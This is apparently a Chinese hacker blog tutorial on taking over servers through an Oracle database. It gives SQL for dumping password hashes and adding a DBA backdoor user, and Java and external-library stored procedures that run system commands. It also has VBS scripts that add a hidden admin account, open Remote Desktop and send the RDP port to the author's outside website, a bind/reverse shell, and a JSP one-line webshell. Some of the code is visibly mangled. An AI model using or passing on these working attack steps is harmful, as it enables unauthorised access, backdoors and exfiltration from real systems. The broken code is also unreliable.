第一部分
基本查询指令
引用
select * from V$PWFILE_USERS //查看dba用户
select * from v$version //查看oracle版本以及系统版本
select * from session_privs;// 查看当前用户拥有的权限值
select * from user_role_privs\\查询当前用户角色
select * from user_sys_privs\\查询当前用户系统权限
select username,password from dba_users; //查看所有用户密码hash
select * from dba_sys_privs where grantee='SYSTEM';\\查系统权限
grant select any dictionary to system with admin option;\\登陆不上OEM时候需要此权限
Select name,password FROM user$ Where name='SCOTT'; //低版本查看单用户密码
Select username,decode(password,NULL,'NULL',password) password FROM dba_users; //查看用户hash
create user bob identified by iloveyou;\\建用户bob密码iloveyou
grant dba to bob;\\赋予bob DBA权限
grant execute on xmldom to bob \\赋予用户execute
Create ROLE "javauserpriv" NOT IDENTIFIED
Create ROLE "javasyspriv" NOT IDENTIFIED \\当提示role 'JAVASYSPRIV' does not exist使用
select grantee from dba_role_privs where granted_role='DBA'; \\检查那些用户有DBA权限
select * from dba_directories;\\查看路径所在目录
第二部分,创建java,执行系统命令
引用
no.1
Create or REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll';
/
show errors
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors
上面这个没有回显的
如果不行可以使用下面这个
引用
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME\msvcrt.dll';
/
show errors
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors
执行完后
执行
引用
exec oracmd.exec ('net1 user robert iloveyou /add');
no2.
Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS
import java.io.*;
public class Host {
public static void executeCommand(String command) {
try {
String[] finalCommand;
if (isWindows()) {
finalCommand = new String[4];
// Use the appropriate path for your windows version.
finalCommand[0] = "C:\\windows\\system32\\cmd.exe"; // Windows XP/2003
//finalCommand[0] = "C:\\winnt\\system32\\cmd.exe"; // Windows NT/2000
finalCommand[1] = "/y";
finalCommand[2] = "/c";
finalCommand[3] = command;
}
else {
finalCommand = new String[3];
finalCommand[0] = "/bin/sh";
finalCommand[1] = "-c";
finalCommand[2] = command;
}
final Process pr = Runtime.getRuntime().exec(finalCommand);
pr.waitFor();
new Thread(new Runnable(){
public void run() {
BufferedReader br_in = null;
try {
br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));
String buff = null;
while ((buff = br_in.readLine()) != null) {
System.out.println("Process out :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_in.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process output.");
ioe.printStackTrace();
}
finally {
try {
br_in.close();
} catch (Exception ex) {}
}
}
}).start();
new Thread(new Runnable(){
public void run() {
BufferedReader br_err = null;
try {
br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));
String buff = null;
while ((buff = br_err.readLine()) != null) {
System.out.println("Process err :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_err.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process error.");
ioe.printStackTrace();
}
finally {
try {
br_err.close();
} catch (Exception ex) {}
}
}
}).start();
}
catch (Exception ex) {
System.out.println(ex.getLocalizedMessage());
}
}
public static boolean isWindows() {
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
return true;
else
return false;
}
};
/
Create or REPLACE PROCEDURE host_command (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME 'Host.executeCommand (java.lang.String)';
/
EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
/
DECLARE
l_output DBMS_OUTPUT.chararr;
l_lines INTEGER := 1000;
BEGIN
DBMS_OUTPUT.enable(1000000);
DBMS_JAVA.set_output(1000000);
host_command('dir C:\');
DBMS_OUTPUT.get_lines(l_output, l_lines);
END;
这个要注意两点
win下注意系统路径
linx下注意注释掉win
最后一句就是执行命令的
引用
host_command('dir C:\');
引用
no3.
create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}
/
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
/
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
/
variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;
这句注意最后这里要授权下当前登陆的用户
引用
grant javasyspriv to system
最后执行
引用
exec :x:=run_cmz('ipconfig');
第二部分 操作磁盘文件
no1.
建立目录
引用
create or replace directory DIR as 'C:\';
此目录当然也可以是启动目录
授权
引用
grant read, write on directory DIR to system
这步可以不用
然后执行操作
写文件 3129_code.txt
# 鬼仔注:写文件的这段代码被nod32误报,好多人以为是被挂马了,无奈只好写进txt了
这步操作讲下载我的木马到c盘并执行
引用
declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389.vbs', 'W');
utl_file.put_line(file, 'Dim OperationRegistry
Set perationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
exec :x:=run_cmz('cscript. c:\3389.vbs');
vbs开启3389
引用
declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'user.vbs', 'W');
utl_file.put_line(file, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK")
s="WinNT://"'||'&'||'wsnetwork.ComputerName
Set a=CreateObject("Scripting.FileSystemObject")
Set b=GetObject(os)
Set e=GetObject(os&"/Administrators,group")
Set d=ob.Create("user","bob")
od.SetPassword "123456abc!@#"
od.SetInfo
Set f=GetObject(os&"/bob",user)
oe.add os&"/bob"
oa.DeleteFile("user.vbs")');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
/
exec :x:=run_cmz('cscript. c:\user.vbs');
无net添加admin用户
引用
declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', '3389p.vbs', 'W');
utl_file.put_line(file, '
Dim OperationRegistry
Set perationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://blog.cnmoker.org/read3389/ro.asp?port=" '||'ccccc'||' TSPort,0
xPost.Send()
TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
TSState=OperationRegistry.RegRead(TSRegPath)
If TSState=0 Then
Else
OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD"
End If
set bj=wscript.createObject("wscript.shell")
obj.Run("sc config TermService start= demand")
obj.Run("sc stop TermService")
obj.Run("sc start TermService")
wscript.quit
');
utl_file.fflush(file);
utl_file.fclose(file);
end;
/
exec :x:=run_cmz('cscript. c:\3389p.vbs');
/
exec :x:=run_cmz('del c:\3389p.vbs');
/
http://blog.cnmoker.org/read3389/read.asp
这个代码的作用是用来读取对方的3389端口并post下自己的网站数据库里
这个read.asp和ro.asp自己写吧
到此win下操作基本上是完成了
第三部分 linux的一些操作
linux的操作要用到sqlj语言
其实ISTO的kj总早就写了一些
我总结
引用
create or replace and compile java source named bob as
import java.io.*;
import java.net.*;
public class BOB{
public static String listFolder(String path){
File f=null;
String str="";
f=new File(path);
String[] files=f.list();
if(files!=null)
for(int i=0;i str+=files[i]+"\r\n"; } return str; } public static String saveFile(String filepath,String value){ FileOutputStream fos=null; try { fos=new FileOutputStream(filepath); fos.write(value.getBytes()); return "OK"; } catch (Exception e) { return e.getMessage(); } finally{ if(fos!=null){ try {fos.close();} catch (Exception e) {} } } } public static String readFile(String pathfile,String code){ BufferedReader br=null; String value=""; try { br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code)); String s=null; while((s=br.readLine())!=null){ value+=s; } return value; } catch (Exception e) { return e.getMessage(); } finally{ if(br!=null){try {br.close();} catch (IOException e) {}} } } public static String execFile(String filepath,String code){ int i=0; Runtime rt=Runtime.getRuntime(); String utput=""; InputStreamReader isr = null; char[] bufferC=new char[1024]; try{ Process ps=rt.exec(filepath); isr=new InputStreamReader(ps.getInputStream(),code); while((i=isr.read(bufferC,0,bufferC.length))!=-1){ output+=new String(bufferC,0,i); } return output; }catch(Exception e){ return e.getMessage(); }finally{ if(isr!=null)try {isr.close();} catch (IOException e) {} } } public static String bindShell(int port){ ServerSocket ss=null; Socket s=null; try { ss = new ServerSocket(port); s=ss.accept(); new optShell(ss,s).start(); return "OK"; } catch (Exception e) { return e.getMessage(); } } public static String reverseShell(String host,int port){ Socket s=null; try{ s=new Socket(host,port); new optShell(null,s).start(); return "OK"; }catch(Exception e){ return e.getMessage(); } } //反弹shell的sqlj语句 public static class optShell extends Thread{ OutputStream s=null; InputStream is=null; ServerSocket ss; Socket s; public optShell(ServerSocket ss,Socket s){ this.ss=ss; this.s=s; try{ this.is=s.getInputStream(); this.os=s.getOutputStream(); }catch(Exception e){ if(os!=null)try {os.close();} catch(Exception ex) {} if(is!=null)try {is.close();} catch(Exception ex) {} if(s!=null)try {s.close();} catch(Exception ex) {} if(ss!=null)try {ss.close();} catch(Exception ex) {} } } public void run(){ BufferedReader br=new BufferedReader(new InputStreamReader(is)); String line=""; String cmdhelp="Command:\r\nlist \r\nsave\r\nread\r\nexec\r\nexit\r\n"; try { //os.write(cmdhelp.getBytes()); line=br.readLine(); while(!"exit".equals(line)){ if(line.length()>3){ StringBuffer sb=new StringBuffer(line.trim()); String cmd=sb.substring(0, 4); if(cmd.equals("list")){ os.write("input you path:\r\n".getBytes()); line=br.readLine(); os.write(listFolder(line).getBytes()); }else if("save".equals(cmd)){ os.write("input you filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you value:\r\n".getBytes()); os.write(saveFile(line,br.readLine()).getBytes()); }else if("read".equals(cmd)){ os.write("input you filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you code examle:GBK\r\n".getBytes()); os.write(readFile(line,br.readLine()).getBytes()); }else if("exec".equals(cmd)){ os.write("input you run filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you code examle:GBK\r\n".getBytes()); os.write(execFile(line,br.readLine()).getBytes()); }else{ os.write(cmdhelp.getBytes()); } }else{ os.write(cmdhelp.getBytes()); } line=br.readLine(); } } catch (Exception e) { e.printStackTrace(); }finally{ if(os!=null)try {os.close();} catch(Exception e) {} if(is!=null)try {is.close();} catch(Exception e) {} if(s!=null)try {s.close();} catch(Exception e) {} if(ss!=null)try {ss.close();} catch(Exception e) {} } } } } / create or replace function BOB_LISTFOLDER(str varchar2) return varchar2 as language java name 'BOB.listFolder(java.lang.String) return java.lang.String'; / create or replace function BOB_SAVEFILE(p varchar2,v varchar2) return varchar2 as language java name 'BOB.saveFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_READFILE(p varchar2,c varchar2) return varchar2 as language java name 'BOB.readFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_EXECFILE(fp varchar2,c varchar2) return varchar2 as language java name 'BOB.execFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_BINDSHELL(port number) return varchar2 as language java name 'BOB.bindShell(int) return java.lang.String'; / begin Dbms_Java.Grant_Permission('scott','java.io.FilePermission','<>','read,write,execute,delete'); Dbms_Java.Grant_Permission('scott','java.lang.RuntimePermission','*','writeFileDescriptor'); Dbms_Java.grant_permission('scott','java.net.SocketPermission','*:*','accept,connect,listen,resolve'); end; 这么一大段,仔细看 执行完后 引用 Select BOB_LISTFOLDER('/usr') FROM DUAL //列目录 Select BOB_EXECFILE('C:\WINDOWS\system32\cmd.exe /c dir c:\','GBK') FROM DUAL; //执行命令 Select BOB_READFILE('/tmp/1.txt','GBK') FROM DUAL; //读文件 Select BOB_SAVEFILE('/tmp/1.jsp','<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>') FROM DUAL; 写jsp一句话 可查看我的上一篇BLOG 引用 Select BOB_BINDSHELL(20000) FROM DUAL //开启端口2000然后你telnet ip 2000上去 其中本来还有reserver shell的 我还没来的及测试 我自己是更中意反弹shell的 特别是linux 好操作的多 再说有时候linux是nat出来的 反弹就去了许多麻烦 第四部分 技巧 一句话读取3389端口 引用 exec :x:=run_cmz('REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber'); 一句话开3389 只合适win 2k3 引用 exec :x:=run_cmz('REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'); 删除pcanywhere导致的终端登陆错误 引用 exec :x:=run_cmz('reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f'); 感谢kj,和linx的文章. 最后说下,关于web injection部分 有时间在整理吧 不妥之处,请指教 QQ:1972097 over